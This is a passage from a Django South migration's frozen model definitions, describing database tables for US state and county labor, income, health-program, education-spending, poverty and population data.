'create_date': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
'employed': ('django.db.models.fields.IntegerField', [], {'null': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'labor_force': ('django.db.models.fields.IntegerField', [], {'null': 'True'}),
'laus_code': ('django.db.models.fields.CharField', [], {'max_length': '8'}),
'state_fips': ('django.db.models.fields.CharField', [], {'max_length': '2'}),
'unemployed': ('django.db.models.fields.IntegerField', [], {'null': 'True'}),
'unemployment_rate': ('django.db.models.fields.FloatField', [], {'null': 'True'}),
'update_date': ('django.db.models.fields.DateTimeField', [], {'auto_now': 'True', 'blank': 'True'}),
'year': ('django.db.models.fields.IntegerField', [], {})
},
'data.laborforcestate': {
'Meta': {'unique_together': "(('year', 'state'),)", 'object_name': 'LaborForceState'},
'civilian_noninstitutional_pop': ('django.db.models.fields.IntegerField', [], {}),
'create_date': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
'employment_pop_rate': ('django.db.models.fields.FloatField', [], {}),
'employment_total': ('django.db.models.fields.IntegerField', [], {}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'labor_force_participation_rate': ('django.db.models.fields.FloatField', [], {}),
'labor_force_total': ('django.db.models.fields.IntegerField', [], {}),
'state': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['data.State']"}),
'unemployment_rate': ('django.db.models.fields.FloatField', [], {}),
'unemployment_total': ('django.db.models.fields.IntegerField', [], {}),
'update_date': ('django.db.models.fields.DateTimeField', [], {'auto_now': 'True', 'blank': 'True'}),
'year': ('django.db.models.fields.IntegerField', [], {})
},
'data.laborforcestateraw': {
'Meta': {'object_name': 'LaborForceStateRaw'},
'area': ('django.db.models.fields.CharField', [], {'max_length': '50'}),
'area_fips': ('django.db.models.fields.CharField', [], {'max_length': '10'}),
'civilian_noninstitutional_pop': ('django.db.models.fields.IntegerField', [], {}),
'create_date': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
'employment_pop_rate': ('django.db.models.fields.FloatField', [], {}),
'employment_total': ('django.db.models.fields.IntegerField', [], {}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'labor_force_participation_rate': ('django.db.models.fields.FloatField', [], {}),
'labor_force_total': ('django.db.models.fields.IntegerField', [], {}),
'unemployment_rate': ('django.db.models.fields.FloatField', [], {}),
'unemployment_total': ('django.db.models.fields.IntegerField', [], {}),
'update_date': ('django.db.models.fields.DateTimeField', [], {'auto_now': 'True', 'blank': 'True'}),
'year': ('django.db.models.fields.IntegerField', [], {})
},
'data.laborunderutilizationstate': {
'Meta': {'unique_together': "(('year', 'state'),)", 'object_name': 'LaborUnderutilizationState'},
'create_date': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'state': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['data.State']"}),
'u1': ('django.db.models.fields.FloatField', [], {}),
'u2': ('django.db.models.fields.FloatField', [], {}),
'u3': ('django.db.models.fields.FloatField', [], {}),
'u4': ('django.db.models.fields.FloatField', [], {}),
'u5': ('django.db.models.fields.FloatField', [], {}),
'u6': ('django.db.models.fields.FloatField', [], {}),
'update_date': ('django.db.models.fields.DateTimeField', [], {'auto_now': 'True', 'blank': 'True'}),
'year': ('django.db.models.fields.IntegerField', [], {})
},
'data.laborunderutilizationstateraw': {
'Meta': {'object_name': 'LaborUnderutilizationStateRaw'},
'create_date': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'state': ('django.db.models.fields.CharField', [], {'max_length': '64'}),
'u1': ('django.db.models.fields.FloatField', [], {}),
'u2': ('django.db.models.fields.FloatField', [], {}),
'u3': ('django.db.models.fields.FloatField', [], {}),
'u4': ('django.db.models.fields.FloatField', [], {}),
'u5': ('django.db.models.fields.FloatField', [], {}),
'u6': ('django.db.models.fields.FloatField', [], {}),
'update_date': ('django.db.models.fields.DateTimeField', [], {'auto_now': 'True', 'blank': 'True'}),
'year': ('django.db.models.fields.IntegerField', [], {})
},
'data.mathsciencespending': {
'Meta': {'object_name': 'MathScienceSpending'},
'agency_id': ('django.db.models.fields.CharField', [], {'max_length': '7'}),
'agency_name': ('django.db.models.fields.CharField', [], {'max_length': '128'}),
'amount': ('django.db.models.fields.IntegerField', [], {'null': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'state': ('django.db.models.fields.CharField', [], {'max_length': '2'}),
'year': ('django.db.models.fields.IntegerField', [], {})
},
'data.medianhouseholdincomestateraw': {
'Meta': {'object_name': 'MedianHouseholdIncomeStateRaw'},
'create_date': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'median_household_income': ('django.db.models.fields.FloatField', [], {'null': 'True'}),
'median_household_income_moe': ('django.db.models.fields.IntegerField', [], {'null': 'True'}),
'state': ('django.db.models.fields.CharField', [], {'max_length': '32'}),
'state_fips': ('django.db.models.fields.CharField', [], {'max_length': '2'}),
'update_date': ('django.db.models.fields.DateTimeField', [], {'auto_now': 'True', 'blank': 'True'}),
'year': ('django.db.models.fields.IntegerField', [], {})
},
'data.medianincomestate': {
'Meta': {'unique_together': "(('year', 'state'),)", 'object_name': 'MedianIncomeState'},
'create_date': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'median_household_income': ('django.db.models.fields.FloatField', [], {}),
'median_household_income_moe': ('django.db.models.fields.IntegerField', [], {}),
'state': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['data.State']"}),
'update_date': ('django.db.models.fields.DateTimeField', [], {'auto_now': 'True', 'blank': 'True'}),
'year': ('django.db.models.fields.IntegerField', [], {})
},
'data.medicaidparticipation': {
'Meta': {'object_name': 'MedicaidParticipation'},
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'state': ('django.db.models.fields.CharField', [], {'max_length': '32'}),
'value': ('django.db.models.fields.IntegerField', [], {'null': 'True'}),
'year': ('django.db.models.fields.IntegerField', [], {})
},
'data.medicareenrollment': {
'Meta': {'object_name': 'MedicareEnrollment'},
'create_date': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'percent': ('django.db.models.fields.FloatField', [], {'null': 'True'}),
'population': ('django.db.models.fields.IntegerField', [], {'null': 'True'}),
'state': ('django.db.models.fields.CharField', [], {'max_length': '32'}),
'update_date': ('django.db.models.fields.DateTimeField', [], {'auto_now': 'True', 'blank': 'True'}),
'value': ('django.db.models.fields.IntegerField', [], {'null': 'True'}),
'year': ('django.db.models.fields.IntegerField', [], {})
},
'data.migrantstudents': {
'Meta': {'object_name': 'MigrantStudents'},
'agency_id': ('django.db.models.fields.CharField', [], {'max_length': '7'}),
'agency_name': ('django.db.models.fields.CharField', [], {'max_length': '128'}),
'amount': ('django.db.models.fields.IntegerField', [], {'null': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'state': ('django.db.models.fields.CharField', [], {'max_length': '2'}),
'year': ('django.db.models.fields.IntegerField', [], {})
},
'data.militarypersonnel': {
'Meta': {'object_name': 'MilitaryPersonnel'},
'civilian_personnel': ('django.db.models.fields.IntegerField', [], {'null': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'military_personnel': ('django.db.models.fields.IntegerField', [], {}),
'reserve_national_guard_personnel': ('django.db.models.fields.IntegerField', [], {'null': 'True'}),
'state': ('django.db.models.fields.CharField', [], {'max_length': '32'}),
'year': ('django.db.models.fields.IntegerField', [], {})
},
'data.msn': {
'Meta': {'object_name': 'Msn'},
'create_date': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'msn_code': ('django.db.models.fields.CharField', [], {'max_length': '5'}),
'msn_desc': ('django.db.models.fields.CharField', [], {'max_length': '255'}),
'msn_unit': ('django.db.models.fields.CharField', [], {'max_length': '255'}),
'update_date': ('django.db.models.fields.DateTimeField', [], {'auto_now': 'True', 'blank': 'True'})
},
'data.nativeedspending': {
'Meta': {'object_name': 'NativeEdSpending'},
'agency_id': ('django.db.models.fields.CharField', [], {'max_length': '7'}),
'agency_name': ('django.db.models.fields.CharField', [], {'max_length': '128'}),
'amount': ('django.db.models.fields.IntegerField', [], {'null': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'state': ('django.db.models.fields.CharField', [], {'max_length': '2'}),
'year': ('django.db.models.fields.IntegerField', [], {})
},
'data.ncesschooldistrict': {
'Meta': {'object_name': 'NcesSchoolDistrict'},
'congress_code': ('django.db.models.fields.CharField', [], {'max_length': '2'}),
'county_code': ('django.db.models.fields.CharField', [], {'max_length': '4'}),
'county_name': ('django.db.models.fields.CharField', [], {'max_length': '255'}),
'district_code': ('django.db.models.fields.CharField', [], {'max_length': '6'}),
'district_name': ('django.db.models.fields.CharField', [], {'max_length': '255'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'state': ('django.db.models.fields.CharField', [], {'max_length': '2'}),
'state_code': ('django.db.models.fields.CharField', [], {'max_length': '2'})
},
'data.newaidscases': {
'Meta': {'object_name': 'NewAidsCases'},
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'state': ('django.db.models.fields.CharField', [], {'max_length': '32'}),
'value': ('django.db.models.fields.IntegerField', [], {'null': 'True'}),
'year': ('django.db.models.fields.IntegerField', [], {})
},
'data.otherfederalrevenue': {
'Meta': {'object_name': 'OtherFederalRevenue'},
'agency_id': ('django.db.models.fields.CharField', [], {'max_length': '7'}),
'agency_name': ('django.db.models.fields.CharField', [], {'max_length': '128'}),
'amount': ('django.db.models.fields.IntegerField', [], {'null': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'state': ('django.db.models.fields.CharField', [], {'max_length': '2'}),
'year': ('django.db.models.fields.CharField', [], {'max_length': '16'})
},
'data.peoplepovertystate': {
'Meta': {'object_name': 'PeoplePovertyState'},
'create_date': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'percent': ('django.db.models.fields.DecimalField', [], {'max_digits': '5', 'decimal_places': '2'}),
'percent_standard_error': ('django.db.models.fields.DecimalField', [], {'max_digits': '5', 'decimal_places': '2'}),
'state': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['data.State']"}),
'total_population': ('django.db.models.fields.IntegerField', [], {}),
'update_date': ('django.db.models.fields.DateTimeField', [], {'auto_now': 'True', 'blank': 'True'}),
'value': ('django.db.models.fields.IntegerField', [], {}),
'value_standard_error': ('django.db.models.fields.IntegerField', [], {}),
'year': ('django.db.models.fields.IntegerField', [], {})
},
'data.peoplepovertystateraw': {
'Meta': {'object_name': 'PeoplePovertyStateRaw'},
'create_date': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'percent': ('django.db.models.fields.DecimalField', [], {'max_digits': '5', 'decimal_places': '2'}),
'percent_standard_error': ('django.db.models.fields.DecimalField', [], {'max_digits': '5', 'decimal_places': '2'}),
'state': ('django.db.models.fields.CharField', [], {'max_length': '32'}),
'total_population': ('django.db.models.fields.IntegerField', [], {}),
'update_date': ('django.db.models.fields.DateTimeField', [], {'auto_now': 'True', 'blank': 'True'}),
'value': ('django.db.models.fields.IntegerField', [], {}),
'value_standard_error': ('django.db.models.fields.IntegerField', [], {}),
'year': ('django.db.models.fields.IntegerField', [], {})
},
'data.populationagecounty': {
'Meta': {'unique_together': "(('year', 'state', 'county'),)", 'object_name': 'PopulationAgeCounty'},
'age_0_19': ('django.db.models.fields.IntegerField', [], {}),
'age_0_19_percent': ('django.db.models.fields.FloatField', [], {'null': 'True'}),
'age_0_4': ('django.db.models.fields.IntegerField', [], {}),
'age_0_4_percent': ('django.db.models.fields.FloatField', [], {'null': 'True'}),
'age_10_14': ('django.db.models.fields.IntegerField', [], {}),
'age_10_14_percent': ('django.db.models.fields.FloatField', [], {'null': 'True'}),
'age_15_19': ('django.db.models.fields.IntegerField', [], {}),
'age_15_19_percent': ('django.db.models.fields.FloatField', [], {'null': 'True'}),
'age_20_24': ('django.db.models.fields.IntegerField', [], {}),
'age_20_24_percent': ('django.db.models.fields.FloatField', [], {'null': 'True'}),
'age_25_29': ('django.db.models.fields.IntegerField', [], {}),
'age_25_29_percent': ('django.db.models.fields.FloatField', [], {'null': 'True'}),
'age_30_34': ('django.db.models.fields.IntegerField', [], {}),
'age_30_34_percent': ('django.db.models.fields.FloatField', [], {'null': 'True'}),
'age_35_39': ('django.db.models.fields.IntegerField', [], {}),
'age_35_39_percent': ('django.db.models.fields.FloatField', [], {'null': 'True'}),
'age_40_44': ('django.db.models.fields.IntegerField', [], {}),
'age_40_44_percent': ('django.db.models.fields.FloatField', [], {'null': 'True'}),
'age_45_49': ('django.db.models.fields.IntegerField', [], {}),
'age_45_49_percent': ('django.db.models.fields.FloatField', [], {'null': 'True'}),
'age_50_54': ('django.db.models.fields.IntegerField', [], {}),
'age_50_54_percent': ('django.db.models.fields.FloatField', [], {'null': 'True'}),
'age_55_59': ('django.db.models.fields.IntegerField', [], {}),
'age_55_59_percent': ('django.db.models.fields.FloatField', [], {'null': 'True'}),
'age_5_9': ('django.db.models.fields.IntegerField', [], {}),
'age_5_9_percent': ('django.db.models.fields.FloatField', [], {'null': 'True'}),
'age_60_64': ('django.db.models.fields.IntegerField', [], {}),
'age_60_64_percent': ('django.db.models.fields.FloatField', [], {'null': 'True'}),
'age_65_69': ('django.db.models.fields.IntegerField', [], {}),
'age_65_69_percent': ('django.db.models.fields.FloatField', [], {'null': 'True'}),
'age_65_over': ('django.db.models.fields.IntegerField', [], {}),
'age_65_over_percent': ('django.db.models.fields.FloatField', [], {'null': 'True'}),
'age_70_74': ('django.db.models.fields.IntegerField', [], {}),
'age_70_74_percent': ('django.db.models.fields.FloatField', [], {'null': 'True'}),
'age_75_79': ('django.db.models.fields.IntegerField', [], {}),
'age_75_79_percent': ('django.db.models.fields.FloatField', [], {'null': 'True'}),
'age_80_84': ('django.db.models.fields.IntegerField', [], {}),
'age_80_84_percent': ('django.db.models.fields.FloatField', [], {'null': 'True'}),
'age_85_over': ('django.db.models.fields.IntegerField', [], {}),
'age_85_over_percent': ('django.db.models.fields.FloatField', [], {'null': 'True'}),
'county': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['data.County']"}),
'create_date': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'state': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['data.State']"}),
'total': ('django.db.models.fields.IntegerField', [], {}),
'update_date': ('django.db.models.fields.DateTimeField', [], {'auto_now': 'True', 'blank': 'True'}),
'year': ('django.db.models.fields.IntegerField', [], {})
},
'data.populationagestate': {
'Meta': {'unique_together': "(('year', 'state'),)", 'object_name': 'PopulationAgeState'},
'age_0_19': ('django.db.models.fields.IntegerField', [], {}),
'age_0_19_percent': ('django.db.models.fields.FloatField', [], {'null': 'True'}),
'age_0_4': ('django.db.models.fields.IntegerField', [], {}),
'age_0_4_percent': ('django.db.models.fields.FloatField', [], {'null': 'True'}),
'age_10_14': ('django.db.models.fields.IntegerField', [], {}),
'age_10_14_percent': ('django.db.models.fields.FloatField', [], {'null': 'True'}),
'age_15_19': ('django.db.models.fields.IntegerField', [], {}),
'age_15_19_percent': ('django.db.models.fields.FloatField', [], {'null': 'True'}),
'age_20_24': ('django.db.models.fields.IntegerField', [], {}),
'age_20_24_percent': ('django.db.models.fields.FloatField', [], {'null': 'True'}),
'age_25_29': ('django.db.models.fields.IntegerField', [], {}),
'age_25_29_percent': ('django.db.models.fields.FloatField', [], {'null': 'True'}),
'age_30_34': ('django.db.models.fields.IntegerField', [], {}),
'age_30_34_percent': ('django.db.models.fields.FloatField', [], {'null': 'True'}),
'age_35_39': ('django.db.models.fields.IntegerField', [], {}),
'age_35_39_percent': ('django.db.models.fields.FloatField', [], {'null': 'True'}),
'age_40_44': ('django.db.models.fields.IntegerField', [], {}),
'age_40_44_percent': ('django.db.models.fields.FloatField', [], {'null': 'True'}),
'age_45_49': ('django.db.models.fields.IntegerField', [], {}),
'age_45_49_percent': ('django.db.models.fields.FloatField', [], {'null': 'True'}),
'age_50_54': ('django.db.models.fields.IntegerField', [], {}),
'age_50_54_percent': ('django.db.models.fields.FloatField', [], {'null': 'True'}),
'age_55_59': ('django.db.models.fields.IntegerField', [], {}),
'age_55_59_percent': ('django.db.models.fields.FloatField', [], {'null': 'True'}),
'age_5_9': ('django.db.models.fields.IntegerField', [], {}),
'age_5_9_percent': ('django.db.models.fields.FloatField', [], {'null': 'True'}),
'age_60_64': ('django.db.models.fields.IntegerField', [], {}),
'age_60_64_percent': ('django.db.models.fields.FloatField', [], {'null': 'True'}),
'age_65_69': ('django.db.models.fields.IntegerField', [], {}),
'age_65_69_percent': ('django.db.models.fields.FloatField', [], {'null': 'True'}),
'age_65_over': ('django.db.models.fields.IntegerField', [], {}),
'age_65_over_percent': ('django.db.models.fields.FloatField', [], {'null': 'True'}),
'age_70_74': ('django.db.models.fields.IntegerField', [], {}),
'age_70_74_percent': ('django.db.models.fields.FloatField', [], {'null': 'True'}),
'age_75_79': ('django.db.models.fields.IntegerField', [], {}),
'age_75_79_percent': ('django.db.models.fields.FloatField', [], {'null': 'True'}),
'age_80_84': ('django.db.models.fields.IntegerField', [], {}),
'age_80_84_percent': ('django.db.models.fields.FloatField', [], {'null': 'True'}),
'age_85_over': ('django.db.models.fields.IntegerField', [], {}),
'age_85_over_percent': ('django.db.models.fields.FloatField', [], {'null': 'True'}),
'create_date': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'state': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['data.State']"}),
'total': ('django.db.models.fields.IntegerField', [], {}),
'update_date': ('django.db.models.fields.DateTimeField', [], {'auto_now': 'True', 'blank': 'True'}),
'year': ('django.db.models.fields.IntegerField', [], {})
},
'data.populationcongressionaldistrict': {
'Meta': {'object_name': 'PopulationCongressionalDistrict'},
'american_indian_alaskan_alone': ('django.db.models.fields.IntegerField', [], {}),
'asian_alone': ('django.db.models.fields.IntegerField', [], {}),
'black_alone': ('django.db.models.fields.IntegerField', [], {}),
'district': ('django.db.models.fields.IntegerField', [], {}),
'hawaiian_pacific_island_alone': ('django.db.models.fields.IntegerField', [], {}),
'households': ('django.db.models.fields.IntegerField', [], {}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'other_alone': ('django.db.models.fields.IntegerField', [], {}),
'state': ('django.db.models.fields.CharField', [], {'max_length': '32'}),
'two_or_more_races': ('django.db.models.fields.IntegerField', [], {}),
'white_alone': ('django.db.models.fields.IntegerField', [], {}),
'year': ('django.db.models.fields.IntegerField', [], {})
},
'data.populationest00raw': {
'Meta': {'unique_together': "(('state', 'county', 'gender', 'ethnic_origin', 'race'),)", 'object_name': 'PopulationEst00Raw'},
'census2010pop': ('django.db.models.fields.IntegerField', [], {'null': 'True'}),
'county': ('django.db.models.fields.CharField', [], {'max_length': '3'}),
'create_date': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
'ctyname': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'estimatesbase2000': ('django.db.models.fields.IntegerField', [], {'null': 'True'}),
'ethnic_origin': ('django.db.models.fields.CharField', [], {'max_length': '1'}),
'gender': ('django.db.models.fields.CharField', [], {'max_length': '1'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'popestimate2000': ('django.db.models.fields.IntegerField', [], {'null': 'True'}),
'popestimate2001': ('django.db.models.fields.IntegerField', [], {'null': 'True'}),
'popestimate2002': ('django.db.models.fields.IntegerField', [], {'null': 'True'}),
'popestimate2003': ('django.db.models.fields.IntegerField', [], {'null': 'True'}),
'popestimate2004': ('django.db.models.fields.IntegerField', [], {'null': 'True'}),
'popestimate2005': ('django.db.models.fields.IntegerField', [], {'null': 'True'}),
'popestimate2006': ('django.db.models.fields.IntegerField', [], {'null': 'True'}),
'popestimate2007': ('django.db.models.fields.IntegerField', [], {'null': 'True'}),
'popestimate2008': ('django.db.models.fields.IntegerField', [], {'null': 'True'}),
'popestimate2009': ('django.db.models.fields.IntegerField', [], {'null': 'True'}),
'popestimate2010': ('django.db.models.fields.IntegerField', [], {'null': 'True'}),
'race': ('django.db.models.fields.CharField', [], {'max_length': '1'}),
'state': ('django.db.models.fields.CharField', [], {'max_length': '2'}),
'stname': ('django.db.models.fields.CharField', [], {'max_length': '32'}),
'sumlev': ('django.db.models.fields.CharField', [], {'max_length': '3'}),
'update_date': ('django.db.models.fields.DateTimeField', [], {'auto_now': 'True', 'blank': 'True'})
},
'data.populationest10raw': {
'Meta': {'unique_together': "(('state', 'county', 'gender', 'ethnic_origin', 'race'),)", 'object_name': 'PopulationEst10Raw'},
'census2010pop': ('django.db.models.fields.IntegerField', [], {'null': 'True'}),
'census2020pop': ('django.db.models.fields.IntegerField', [], {'null': 'True'}),
'county': ('django.db.models.fields.CharField', [], {'max_length': '3'}),
'create_date': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
'ctyname': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'estimatesbase2010': ('django.db.models.fields.IntegerField', [], {'null': 'True'}),
'ethnic_origin': ('django.db.models.fields.CharField', [], {'max_length': '1'}),
'gender': ('django.db.models.fields.CharField', [], {'max_length': '1'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'popestimate2010': ('django.db.models.fields.IntegerField', [], {'null': 'True'}),
'popestimate2011': ('django.db.models.fields.IntegerField', [], {'null': 'True'}),
'popestimate2012': ('django.db.models.fields.IntegerField', [], {'null': 'True'}),
'popestimate2013': ('django.db.models.fields.IntegerField', [], {'null': 'True'}),
'popestimate2014': ('django.db.models.fields.IntegerField', [], {'null': 'True'}),
'popestimate2015': ('django.db.models.fields.IntegerField', [], {'null': 'True'}),
'popestimate2016': ('django.db.models.fields.IntegerField', [], {'null': 'True'}),
'popestimate2017': ('django.db.models.fields.IntegerField', [], {'null': 'True'}),
'popestimate2018': ('django.db.models.fields.IntegerField', [], {'null': 'True'}),
'popestimate2019': ('django.db.models.fields.IntegerField', [], {'null': 'True'}),
'popestimate2020': ('django.db.models.fields.IntegerField', [], {'null': 'True'}),
'race': ('django.db.models.fields.CharField', [], {'max_length': '1'}),
'state': ('django.db.models.fields.CharField', [], {'max_length': '2'}),
'stname': ('django.db.models.fields.CharField', [], {'max_length': '32'}),
'sumlev': ('django.db.models.fields.CharField', [], {'max_length': '3'}),
'update_date': ('django.db.models.fields.DateTimeField', [], {'auto_now': 'True', 'blank': 'True'})
},
'data.populationest90raw': {
'Meta': {'unique_together': "(('year', 'state', 'county', 'agegrp', 'race_gender', 'ethnic_origin'),)", 'object_name': 'PopulationEst90Raw'},
'agegrp': ('django.db.models.fields.CharField', [], {'max_length': '2'}),
'county': ('django.db.models.fields.CharField', [], {'max_length': '3'}),
'create_date': ('django.db.models.fields.DateField', [], {'auto_now_add': 'True', 'blank': 'True'}),
'ethnic_origin': ('django.db.models.fields.CharField', [], {'max_length': '1'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'population': ('django.db.models.fields.IntegerField', [], {'null': 'True'}),
'race_gender': ('django.db.models.fields.CharField', [], {'max_length': '2'}),
'state': ('django.db.models.fields.CharField', [], {'max_length': '2'}),
'update_date': ('django.db.models.fields.DateField', [], {'auto_now': 'True', 'blank': 'True'}),
'year': ('django.db.models.fields.CharField', [], {'max_length': '2'})
},
'data.populationfamilies': {
'Meta': {'object_name': 'PopulationFamilies'},
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'state': ('django.db.models.fields.CharField', [], {'max_length': '32'}),
'value': ('django.db.models.fields.IntegerField', [], {}),
'year': ('django.db.models.fields.IntegerField', [], {})
},
'data.populationgendercounty': {
'Meta': {'unique_together': "(('year', 'state', 'county'),)", 'object_name': 'PopulationGenderCounty'},
'county': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['data.County']"}),
'create_date': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
'female': ('django.db.models.fields.IntegerField', [], {}),
'female_percent': ('django.db.models.fields.DecimalField', [], {'max_digits': '5', 'decimal_places': '2'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'male': ('django.db.models.fields.IntegerField', [], {}),
'male_percent': ('django.db.models.fields.DecimalField', [], {'max_digits': '5', 'decimal_places': '2'}),
'state': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['data.State']"}),
'total': ('django.db.models.fields.IntegerField', [], {}),
'update_date': ('django.db.models.fields.DateTimeField', [], {'auto_now': 'True', 'null': 'True', 'blank': 'True'}),
'year': ('django.db.models.fields.IntegerField', [], {})
},
'data.populationgenderstate': {
'Meta': {'unique_together': "(('year', 'state'),)", 'object_name': 'PopulationGenderState'},
'create_date': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
'female': ('django.db.models.fields.IntegerField', [], {}),
'female_percent': ('django.db.models.fields.DecimalField', [], {'max_digits': '5', 'decimal_places': '2'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'male': ('django.db.models.fields.IntegerField', [], {}),
'male_percent': ('django.db.models.fields.DecimalField', [], {'max_digits': '5', 'decimal_places': '2'}),
'state': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['data.State']"}),
'total': ('django.db.models.fields.IntegerField', [], {}),
'update_date': ('django.db.models.fields.DateTimeField', [], {'auto_now': 'True', 'blank': 'True'}),
'year': ('django.db.models.fields.IntegerField', [], {})
},
'data.populationracecounty': {
'Meta': {'unique_together': "(('year', 'state', 'county'),)", 'object_name': 'PopulationRaceCounty'},
'asian_alone': ('django.db.models.fields.IntegerField', [], {'null': 'True'}),
'asian_alone_hispanic': ('django.db.models.fields.IntegerField', [], {'null': 'True'}),
'asian_alone_hispanic_percent': ('django.db.models.fields.FloatField', [], {'null': 'True'}),
'asian_alone_nonhispanic': ('django.db.models.fields.IntegerField', [], {'null': 'True'}),
'asian_alone_nonhispanic_percent': ('django.db.models.fields.FloatField', [], {'null': 'True'}),
'asian_alone_percent': ('django.db.models.fields.FloatField', [], {'null': 'True'}),
'asian_other': ('django.db.models.fields.IntegerField', [], {'null': 'True'}),
'asian_other_hispanic': ('django.db.models.fields.IntegerField', [], {'null': 'True'}),
'asian_other_hispanic_percent': ('django.db.models.fields.FloatField', [], {'null': 'True'}),
'asian_other_nonhispanic': ('django.db.models.fields.IntegerField', [], {'null': 'True'}),
'asian_other_nonhispanic_percent': ('django.db.models.fields.FloatField', [], {'null': 'True'}),
'asian_other_percent': ('django.db.models.fields.FloatField', [], {'null': 'True'}),
'asian_pacific_islander_alone': ('django.db.models.fields.IntegerField', [], {'null': 'True'}),
'asian_pacific_islander_alone_percent': ('django.db.models.fields.FloatField', [], {'null': 'True'}),
'black_alone': ('django.db.models.fields.IntegerField', [], {}),
'black_alone_hispanic': ('django.db.models.fields.IntegerField', [], {'null': 'True'}),
'black_alone_hispanic_percent': ('django.db.models.fields.FloatField', [], {'null': 'True'}),
'black_alone_nonhispanic': ('django.db.models.fields.IntegerField', [], {'null': 'True'}),
'black_alone_nonhispanic_percent': ('django.db.models.fields.FloatField', [], {'null': 'True'}),
'black_alone_percent': ('django.db.models.fields.FloatField', [], {}),
'black_other': ('django.db.models.fields.IntegerField', [], {'null': 'True'}),
'black_other_hispanic': ('django.db.models.fields.IntegerField', [], {'null': 'True'}),
'black_other_hispanic_percent': ('django.db.models.fields.FloatField', [], {'null': 'True'}),
'black_other_nonhispanic': ('django.db.models.fields.IntegerField', [], {'null': 'True'}),
'black_other_nonhispanic_percent': ('django.db.models.fields.FloatField', [], {'null': 'True'}),
'black_other_percent': ('django.db.models.fields.FloatField', [], {'null': 'True'}),
'county': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['data.County']"}),
'create_date': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
'hispanic': ('django.db.models.fields.IntegerField', [], {'null': 'True'}),
'hispanic_percent': ('django.db.models.fields.FloatField', [], {'null': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'multiple_race': ('django.db.models.fields.IntegerField', [], {'null': 'True'}),
'multiple_race_hispanic': ('django.db.models.fields.IntegerField', [], {'null': 'True'}),
'multiple_race_hispanic_percent': ('django.db.models.fields.FloatField', [], {'null': 'True'}),
'multiple_race_nonhispanic': ('django.db.models.fields.IntegerField', [], {'null': 'True'}),
'multiple_race_nonhispanic_percent': ('django.db.models.fields.FloatField', [], {'null': 'True'}),
'multiple_race_percent': ('django.db.models.fields.FloatField', [], {'null': 'True'}),
